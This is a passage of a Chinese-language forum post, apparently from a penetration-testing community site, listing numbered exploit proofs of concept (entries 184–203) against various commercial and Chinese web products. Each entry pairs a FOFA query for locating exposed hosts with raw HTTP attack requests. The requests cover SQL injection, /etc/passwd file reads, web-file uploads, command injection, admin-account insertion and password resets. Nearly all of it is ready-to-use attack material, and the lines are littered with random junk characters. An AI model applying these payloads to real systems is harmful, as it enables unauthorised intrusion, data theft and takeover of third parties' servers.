Host: your-ip5 m8 `7 T& R* h3 M
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 Q( d' V: B9 b; `% e, h: M/ ~' FAccept-Charset: utf-8
; }9 F3 R. |( XAccept-Encoding: gzip, deflate0 L$ y3 K5 V) o& I5 S# m
Connection: close
  e; B1 }" B' |# _( M, ]
6 g5 x5 J4 |/ G4 Z- a6 q' o5 n5 u8 w/ e/ X
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
  \) C! ^; s$ l2 DFOFA:server="SunFull-Webs"
: o, `$ d. f! P$ [$ kPOST /soap/AddUser HTTP/1.1
% F3 w+ U( Y9 r" ^8 I8 e' cHost: your-ip
5 v3 ?) U; ]0 J( BAccept-Encoding: gzip, deflate
* H9 L0 T& i" q: q" n: R4 x1 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
$ H" E$ K* ?# Z4 lAccept: application/xml, text/xml, */*; q=0.01
8 D" q3 A$ d2 W9 Y! |* I' }4 d% DContent-Type: text/xml; charset=utf-8! l% c" U7 z% N0 n3 n/ s  v5 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 H3 ~( _5 Q9 \$ Q' p- L; ?
X-Requested-With: XMLHttpRequest
4 L0 m! n- X7 h) x6 v  F3 x  Z- {% z' R1 U: p0 I' t

  _: \9 c. s) e; @0 p; U8 ^insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'); A- L. z* b( b
: [0 b1 v# X  }+ }6 F
; w5 I7 r9 S0 T1 ]0 ?2 O# g" @
185. 瑞友天翼应用虚拟化系统SQL注入1 G' o( H4 j. y) h; f
version < 7.0.5.1
6 b1 m( L+ B4 N$ q8 }- u( W7 h. rFOFA:app="REALOR-天翼应用虚拟化系统"6 P7 u  m" p' H4 ^7 |$ F0 P, A4 K4 H
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
# Y* f' M/ G' W2 R+ GHost: host, N7 m, K6 k/ M9 M

5 H0 c( U7 y8 U1 _
  D5 a, e& X  j6 W  o/ E186. F-logic DataCube3 SQL注入  j! |1 ~8 V( @& v0 ]9 V
CVE-2024-31750
4 C" \/ J8 m: p# y1 cF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
8 }7 R5 I6 C* A) @FOFA:title=="DataCube3"
; [4 d; [& Q' ~5 z/ wPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1+ f1 P& ~# S% l  o6 J; u( u& P
Host: your-ip
2 F; l5 f* P4 r2 `& t$ b( r, oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
7 b7 ?( R# m# ~# R+ N' zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.84 S; q0 W2 Z( S8 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- a, d- B1 B4 j- o$ o/ V9 \; q4 H
Accept-Encoding: gzip, deflate
* }( o7 ]* f: eConnection: close9 `4 c" T+ a5 ~, L3 `
Content-Type: application/x-www-form-urlencoded: T3 l, a( q* m
7 K3 R2 r2 g0 v' O  @  i/ J' f0 p) o
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
% v5 ^/ p* P$ e) H" q3 ^
- J0 \3 d$ u" V4 |* J0 R: u
  \7 z* W6 Z& @( w6 Z0 D4 y3 g% ~, T187. Mura CMS processAsyncObject SQL注入+ h+ ?2 h- I9 B! O  B3 m
CVE-2024-32640' W# t  Z, X2 B# n3 Q+ o1 ]% w
FOFA:"Mura CMS"
8 l, P; M9 N* h) a( m. APOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.16 @& G$ ]3 L: v, C# Z  W
Host: your-ip
, d4 Y4 Z! Y; G$ \8 q) c8 O0 H3 fContent-Type: application/x-www-form-urlencoded. a0 c! x  [2 S2 d$ ?

% v* O" [' Z; m% s1 D. h  y" T5 A1 V. L( o' H# G7 Y
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
  s' ]% F, S4 ~5 A# G
, m* Y+ O* V  V0 u. Y
. o+ n) \% i" q  @7 M! l188. 叁体-佳会视频会议 attachment 任意文件读取
' ^* z' v; j+ z! H) X5 d2 r; M8 {6 [" qversion <= 3.9.7
% x$ `, }' `  |0 G$ v/ A% q8 N9 BFOFA:body="/system/get_rtc_user_defined_info?site_id". E1 m, H; \- a$ w6 H
GET /attachment?file=/etc/passwd HTTP/1.18 Y7 G1 R& Y2 M$ [3 M, i4 `
Host: your-ip
$ E/ [( i  |) l3 j2 C- @* cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ Z: ^0 a- \; h- o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 }0 C3 C/ }! J% j6 X
Accept-Encoding: gzip, deflate
- o  ?$ m: U/ R6 P$ BAccept-Language: zh-CN,zh;q=0.9,en;q=0.8" {& F. k. B; ]& k) }2 H
Connection: close- N( O: A: q) G+ S' U

) Z+ N0 F( O& V
$ [' {# m: V/ N189. 蓝网科技临床浏览系统 deleteStudy SQL注入' d! t" o+ ?" |+ p7 _# `% n
FOFA:app="LANWON-临床浏览系统"  \% [5 u4 Q* ?: l5 e
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.14 R% ]& x' O) }% z* y
Host: your-ip& n: g9 }  d9 D: q2 w) v! Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36. {7 N2 T' ^% ?/ U% w7 e* w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. t; \3 d# ^. tAccept-Encoding: gzip, deflate
: v* q3 i  H: _: DAccept-Language: zh-CN,zh;q=0.9) F- o1 y- f2 g, I
Connection: close, m4 T# i/ T+ X

: ?! U8 E9 h% B
$ I4 i. C( \- D7 F190. 短视频矩阵营销系统 poihuoqu 任意文件读取6 o# P5 u* c$ p0 g
FOFA:title=="短视频矩阵营销系统"5 A2 b3 H; x( c. ^$ ~
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
: x- @* J3 I& A4 zHost: your-ip
( j* ]  D9 ~9 o# a2 C, d2 r7 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36* r5 H* H8 j% m' m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9) a& _& @4 L" S, M
Content-Type: application/x-www-form-urlencoded& f+ O" a% [. T
Accept-Encoding: gzip, deflate& j, H5 ~$ k) W' C. C& z
Accept-Language: zh-CN,zh;q=0.9) ^' I* Z: ]# e
: d0 J* J  R5 N  J5 s
poi=file:///etc/passwd3 D' U" P& E* ~9 r: c0 `+ n
- r! S9 P7 {; C4 c& U- J( f
* ?' o7 K: n- Y' t  P( m/ K/ H
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入2 ?: }' g7 W. x; P# j* o% A
FOFA:body="/CDGServer3/index.jsp"9 u* D1 Y4 k: V) V- o7 }, Y! U: m3 Z' s
POST /CDGServer3/js/../NavigationAjax HTTP/1.11 ?2 \9 N- H( T! d, _
Host: your-ip) n& }/ n% f3 @% ~7 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ T* j# J' @& f
Content-Type: application/x-www-form-urlencoded) U- @5 b( R: E. n# d
+ {' H, s; B: c4 k
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
5 L. z3 _9 K8 [' G6 {0 _& _- F7 P; T. `: e5 F
$ y7 ^# p3 l& |/ c
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
$ Q0 z" i/ Q3 j! L2 f& ZFOFA:title="用户登录_富通天下外贸ERP"
6 r0 M3 }& F  F5 Q% J- EPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
3 A% w: B% d. G% q3 ~  D& EHost: your-ip
1 Y) H3 ?5 d- q$ p% d3 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
  n7 K6 _4 i" U; l( S# x. W" qContent-Type: application/x-www-form-urlencoded
1 Q! p% v& v1 j( {2 z0 h8 [! F/ E4 l. [, F& |

+ o! P/ X4 V0 V* V. d$ T- \& P3 I<% @ webhandler language="C#" class="AverageHandler" %>! M* ~* h. u  z- u& W/ E
using System;3 J9 t2 P% p/ ]# b5 ~$ J
using System.Web;! c1 Q6 S1 m5 I! \# F3 s0 i
public class AverageHandler : IHttpHandler  a5 q" r# l/ y" f& z% J
{
5 K/ o2 U! ?9 [- s3 _# i) o# dpublic bool IsReusable, b6 E! w4 g3 \  t. j- D5 A
{ get { return true; } }
3 k- |* s0 T9 q# A: \public void ProcessRequest(HttpContext ctx)
! P- k, E7 |$ U3 c0 G4 U+ Q0 ^{  m. }  T8 n/ v$ `7 w
ctx.Response.Write("test");
6 k9 _3 \) C; H}
( U8 Q1 I  z5 p}
9 d6 k. p: J1 x7 |8 A* h1 s. B  H4 z, n. b& ]& v$ A; ?/ B
3 I( S/ N* W6 V% H  j' ?+ f
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行- D" Z8 \4 m+ m% R
FOFA:body="山石云鉴主机安全管理系统") D; m, m# c6 Z6 B+ o2 \. ?
GET /master/ajaxActions/getTokenAction.php HTTP/1.1, D4 a! g7 W# i% h5 Y# D
Host:0 r& S& Z( ~( m) e# P/ D% m
Cookie: PHPSESSID=2333333333333;& ]: S& @- O& w0 R: R
Content-Type: application/x-www-form-urlencoded
& s+ {) E+ H7 g' }. P  nUser-Agent: Mozilla/5.0' A. _, N  j# X
% v' d# R1 r, L2 D$ N) [. F* t

7 j0 p* k+ Z: E  m2 n' c3 W( FPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1+ ?: y: _9 y0 L1 M/ r" y
Host:* g) H/ n4 t" E" I, W% T
User-Agent: Mozilla/5.03 D3 `: [& T9 [/ y+ _9 E& C# W) ]' X
Accept-Encoding: gzip, deflate  O0 m% }  V% B$ J$ V+ |. @
Accept: */*
. m; }% Z2 }! k5 U( y) j6 v4 R' Z2 ?Connection: close
9 }' z. z$ \$ a# iCookie: PHPSESSID=2333333333333;
- @6 @% t9 S* G: b/ o" DContent-Type: application/x-www-form-urlencoded# F4 M2 f! j7 M( \! v7 y, V( Z
Content-Length: 842 Z3 @2 L% ]: T
$ Z" E* g' B" `
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
1 c$ ~% u* i8 B9 p  y( M5 s
* R: J$ o9 v5 }& y1 m! O0 `
4 z" z6 [5 k; x8 m9 z, KGET /master/img/config HTTP/1.1
$ Y" ^6 q  O; b' G/ |Host:, Z, Q; B' m  K# h* ^* t& d% V
User-Agent: Mozilla/5.0% U! G) u3 l! Z) M, A

5 Q# e1 u1 B' O+ q" U: M* X( U
9 ?7 p- \- J" I* f+ c( }, O194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传0 z- C$ q. H! W3 A4 g/ g
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在  q+ v( w# Z! m" W# A, R' h

/ o5 T+ c7 n+ k* T' NPOST /servlet/uploadAttachmentServlet HTTP/1.1
! ^9 e5 K1 }, p  o1 {( ?Host: host- n  K1 B5 O8 T8 `4 ^5 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
# I! Y  Q6 q! O& x1 _4 ]) h+ rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" p% j/ Y' m( xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 D9 N* N$ i: p8 ?" v$ _2 H& lAccept-Encoding: gzip, deflate) V( Y8 G! ]; R  e- x1 y
Connection: close
) P" ^) Z8 O# o& P# c; G/ BContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
1 \+ B7 e) C5 s! h* g------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- j* \' \3 _% \" H6 h+ w  ]. }7 \* Q
$ j. U' E: k, {! uContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
# d( A( e( s; q3 uContent-Type: text/plain
  |0 M# Q' L9 ~<% out.println("hello");%>
9 V2 E- [3 C; K3 z2 [0 z. n: g------WebKitFormBoundaryKNt0t4vBe8cX9rZk  K" A, V) G9 e# w
Content-Disposition: form-data; name="json"0 {% A% q  A9 e) x# ]* ]
{"iq":{"query":{"UpdateType":"mail"}}}6 q+ c  ]- S1 I, m9 D' v% }6 o" {
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
7 {9 l* S' U) ~2 K' j6 Z
- `! K% a( A1 k8 v! E8 O% c: n5 C- H3 A7 u% Z
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行( h& O, D7 r# X4 s5 r; x0 p
FOFA:title=="飞鱼星企业级智能上网行为管理系统+ [6 [" ~* J! }# X" I% G
POST /send_order.cgi?parameter=operation HTTP/1.1
1 r; b. i  |5 F5 }; {$ [2 S. p8 v8 VHost: 127.0.0.1- {" O  n+ Z1 W
Pragma: no-cache2 I! c. F+ g- l: M9 ^
Cache-Control: no-cache
; Z( J1 |- J( Y- B* y& b& vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
0 Z  s. L3 |# y& _0 @3 @Accept: */*
5 j) g( H6 R% z6 m! h/ mAccept-Encoding: gzip, deflate
4 o( _0 y4 r+ K6 XAccept-Language: zh-CN,zh;q=0.9
! e/ h' F: ~% T% H, _Connection: close' u  Q8 g, R. j2 D  G4 k7 o
Content-Type: application/x-www-form-urlencoded
+ q$ i+ }) b/ r! m) M# ?! K6 gContent-Length: 68
' t, T- K# _( x4 k6 |2 y. X1 i( x5 o1 S* L# q, k1 o0 }) ^
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
8 t  J3 L" h- Z2 b
) D- n* \! t  |- ^0 k9 Y6 s3 U5 d6 T3 {* m; U
196. 河南省风速科技统一认证平台密码重置
  U: ?5 s/ _! MFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
5 V+ u% N' E- W$ N/ C; @% L% hPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
5 Y9 c! X$ b0 F8 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
: f7 s" o; j% CContent-Type: application/json;charset=UTF-8+ ^  ?( o% `! B( }: E: t' n
X-Requested-With: XMLHttpRequest8 ]7 \# K; O. Q! A
Host:" J, O+ D+ B7 y5 f: c# V
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.22 H  X/ }6 h0 }) y* N+ G
Content-Length: 455 u  a  Z6 V$ p% \& ?
Connection: close
! y. c8 e/ p* j3 R
7 k, h0 S) }' |9 G+ l{"xgh":"test","newPass":"test666","email":""}. W6 k. {( q! N6 J7 D  a# ~
5 O9 x+ a' r% u1 V
" x8 ~! e" q9 h) i7 T" R: s% r6 O
3 Q' z7 F. F' {' O/ T. w
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
/ ^$ d0 z' S( @' uFOFA:app="浙大恩特客户资源管理系统"
) i% B; ?. N" K: _0 o1 sGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
& V0 S4 d+ E- G% I2 H# ^Host:& L- |4 i7 ~$ ]8 O3 {& Z! o4 }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36' G5 d2 S5 b: j" U( b
Accept-Encoding: gzip, deflate
6 J& }  \. w: e2 aConnection: close
2 G; C- q- M/ g
6 Y, ^$ R, [4 R
$ c! W+ O$ p6 A1 j$ w6 x+ U
3 \; f3 q; x) ^2 u, i- }198.  阿里云盘 WebDAV 命令注入
, x8 K+ |2 t. q- d$ U' {, F' Z/ lCVE-2024-29640% h+ E! _! ]' d0 u1 I; V
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
3 M& K% ]! I; m( v7 h' r3 kCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
5 j: w" B$ c! C9 ?7 Y! s( _Accept: */*
/ K. D% W8 d$ [Accept-Encoding: gzip, deflate2 z5 C  e! b3 [+ U1 r
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
1 [( o2 Z0 `8 f9 ]) NConnection: close
" U+ `6 x, U$ O0 ^, v
9 B- T6 ]$ \4 x& q! L. i7 {7 ?2 m
% O' w3 U- w' P5 B: J4 {, k199. cockpit系统assetsmanager_upload接口 文件上传' v5 `, ?1 U/ g% c) o
( b0 j' I, v- T1 g0 d
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
7 o# S8 A, `# t/ l& [GET /auth/login?to=/ HTTP/1.1: G% E  P) \1 h' b8 h+ ^5 `" j
3 u! X( [9 G) n3 p# `7 W/ P
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
& t+ u' n4 b1 r8 d
, Y" ]2 K+ O" g+ ]2.使用刚才上一步获取到的jwt获取cookie:3 t+ E- U) C8 d- c* F" }# T

8 Z- B) u! B6 q5 Z# CPOST /auth/check HTTP/1.1$ _8 z& ?6 O2 t" I" u! U
Content-Type: application/json
2 W" g$ c  {- A: ?5 P! @: d  k
/ u% t" T! p  X{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}- {4 n* R5 Q1 e: _1 D

. z5 ^) E( o  m; {6 E) s  g7 p7 Y" e响应:200,返回值:
: n5 r4 h  W; x3 b/ ~$ m3 L4 gSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
: u7 o# ^3 m7 |) ]8 b5 i3 @Fofa:title="Authenticate Please!"
5 c$ a& P% I( A; m4 ~: MPOST /assetsmanager/upload HTTP/1.1
  S% e0 L4 h2 N# h8 ZContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
5 o  I# ]3 g9 {0 ICookie: mysession=95524f01e238bf51bb60d77ede3bea92
. g6 u& _) l9 x4 J! X. r* c" Y1 W7 ]8 f' P( |+ t6 c
-----------------------------36D28FBc36bd6feE7Fb3
1 }- K, N! w* P+ [1 jContent-Disposition: form-data; name="files[]"; filename="tttt.php"4 n1 m  Q' l& I3 k" L$ _
Content-Type: text/php
9 w$ _9 X/ H2 q: g. B, L
5 \$ R, c+ ^3 u3 ?<?php echo "tttt";unlink(__FILE__);?>+ c2 z3 _3 O( D5 `
-----------------------------36D28FBc36bd6feE7Fb3
5 m  u7 {- p# o  \+ NContent-Disposition: form-data; name="folder"
6 y# ^( c" B' q3 d, e1 R( e- |8 x' H7 u0 B5 ?4 R
-----------------------------36D28FBc36bd6feE7Fb3--
! ?% D0 h* ~7 O
; F8 R# S0 g5 Q' Y  G* N7 V+ y" p+ B' P4 z( y
/storage/uploads/tttt.php6 F: O" p  @$ o+ `) a/ X+ y; }3 o' ^! \

6 B) j& P) R3 [6 T3 f- b200. SeaCMS海洋影视管理系统dmku SQL注入6 F. D" k/ u, c9 ^0 h1 w5 T
FOFA:app="海洋CMS"
, l  }1 @! u: u1 s6 \$ O/ lGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.12 h- d  r/ B( h( r5 V$ m3 }
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
# k- p; |# m  l: R1 [) d4 V7 GUpgrade-Insecure-Requests: 1& ^" }, N  i3 D1 F& {) `% y
Cache-Control: max-age=0
6 l: ?3 n/ Q5 |7 O  v8 Z& \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 s( _: z) p. F# @3 U0 u$ P: ]
Accept-Encoding: gzip, deflate: |5 o: N1 e6 h. ]
Accept-Language: zh-CN,zh;q=0.9
# e/ ^  j0 w! b7 s* B4 h, A. v* Z% V+ R5 q, Q' O

3 i/ b/ M  h9 X4 m$ M201. 方正全媒体新闻采编系统 binary SQL注入- b  A& F* a, p- ]  `
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
$ F; O2 h6 l, u: V* I- |POST /newsedit/newsplan/task/binary.do HTTP/1.19 _. y: |& ^4 I: w/ R
Content-Type: application/x-www-form-urlencoded
2 T1 j7 w8 u- }( m) Y# VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 z2 i- O( w9 F: T+ E: WAccept-Encoding: gzip, deflate  v0 K: K6 N1 s# m# T! y9 h
Accept-Language: zh-CN,zh;q=0.9
$ M; y# D/ C8 e7 ?  L: qConnection: close4 D% z+ Q% }  z: K+ K: l& f

2 E+ v; E: @0 `# k/ Z" BTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=14 o1 U8 E; |, i0 Y3 ~/ d
" Y, u- J% V2 y; Q; X1 j7 c

8 \. M6 o+ q9 t7 W6 V8 J0 u202. 微擎系统 AccountEdit任意文件上传
( K& O; C% Y0 `. W, bFOFA:body="/Widgets/WidgetCollection/"
: g, ]' d& n& d9 D* ~9 O获取__VIEWSTATE和__EVENTVALIDATION值6 ?/ W$ p8 i9 O" t7 g; {6 P# a
GET /User/AccountEdit.aspx HTTP/1.18 j5 X6 _; x, w6 t0 F+ i/ u5 E9 @
Host: 滑板人之家
4 X" T2 m5 E# yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31$ f( E9 R! x' l4 T/ y
Content-Length: 0
  c6 h0 j" _* r3 |0 b: G' w9 c
- q) I. E: o8 K2 K5 P( N. N% N- N/ ^- z4 ?8 k) r0 C$ I; q  C7 `
替换__VIEWSTATE和__EVENTVALIDATION值
6 A8 e; I8 M/ E- @; O$ bPOST /User/AccountEdit.aspx HTTP/1.1$ B0 Z+ N# a! J9 R
Accept-Encoding: gzip, deflate, br6 d- D, ~  a7 f5 t& u: R! O
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
) t" M6 f/ G. S6 U: N7 `; q3 E& U/ {! l2 E) N# |/ j
-----------------------------786435874t385875938657365873465673587356870 ^! {* E1 b9 N
Content-Disposition: form-data; name="__VIEWSTATE"8 s( s# d, C: {
! d+ U* v5 j8 S8 X) @0 d
__VIEWSTATE' \# J$ ?+ y0 b+ T$ {9 t: r: a, j
-----------------------------786435874t38587593865736587346567358735687
  }( d; o" V& J2 q; t  `Content-Disposition: form-data; name="__EVENTVALIDATION"
4 ~6 s2 x2 E, D7 x4 l- v, p" y8 c- g* E
__EVENTVALIDATION( E  H0 Z8 F0 n! s" X
-----------------------------786435874t38587593865736587346567358735687
* D5 p( h" V! Q  K7 K9 s! E3 ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"  k3 _. R9 Y, z6 b
Content-Type: text/plain! \- `8 N* u1 X! y0 w# L, G
. B, c! Q  N- b$ n' }& T  E  Q
Hello World!  A# @% d3 ^6 q. c! Z* o( `  j
-----------------------------786435874t38587593865736587346567358735687
! |" |: u; j1 A& w9 f# iContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload": S+ v2 {6 d6 d, o. {! b/ \7 z! \3 g3 C
) g  P( Z' l, C
上传图片7 H2 @2 V" K, B, E
-----------------------------786435874t38587593865736587346567358735687
2 n; k, s( z- s7 SContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName": L. A) W' a1 L5 u, s" L3 B  y( Q5 v9 q. e
% B8 }$ U% [1 l/ ^. ~3 l
1 c" I. i$ J3 k" A: Q' S% h" x
-----------------------------786435874t38587593865736587346567358735687
  i! A0 F3 F) P, B2 EContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"# T  y' u5 `* F! E$ p2 _

: e6 i; n: ^0 M( T6 W$ W
9 a8 R7 r9 Y2 |% J* E-----------------------------786435874t38587593865736587346567358735687--
  X( M+ M  B+ n8 s: \
9 w8 |0 A& \+ B- X
5 w- H4 a" m% t/ a8 r/_data/Uploads/1123.txt4 T6 [. J8 S' l5 C+ u$ y

; R3 i7 D# s2 b6 E( F+ Y+ y: Z203. 红海云EHR PtFjk 文件上传1 w3 L8 p: j8 i1 K
FOFA:body="RedseaPlatform"" ?2 a9 i" _3 c1 L/ u0 V. |: k2 C
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
% L1 {* p( j! b# e3 h/ L- H/ p- lHost: x.x.x.x& K, t. u$ L8 d$ J; m  Z; B
Accept-Encoding: gzip1 h# ]0 k: K& u) U8 }3 U* n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! Z  J+ `2 j: o, L& I$ d) \% K- QContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys48 V4 ~# N" o4 Q5 D3 k+ z: c2 d
Content-Length: 2106 }  D5 W  ?1 p# N; c' z

9 G' F8 }. V, E6 Q$ H------WebKitFormBoundaryt7WbDl1tXogoZys4  _- V# n2 C; c7 [) Y
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
4 h7 Y  E8 ~* \Content-Type:image/jpeg3 T7 h% Q4 ?$ ?* w5 I' q! C5 u

! S: Y$ i" r8 t% [- l<% out.print("hello,eHR");%>
3 u  `' \8 i# Q7 N------WebKitFormBoundaryt7WbDl1tXogoZys4--
3 w  S. T' e5 p2 \7 U2 m# }- T. j4 X& `5 O- w
9 x7 b" Y* ^& h1 [0 @

2 H0 H/ U9 v8 j7 O2 `, ~. s; x' Q6 C0 J8 a  x- p
: w0 {3 e0 `. \9 n! t) h

# \$ R& w8 @4 t$ ^: |



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2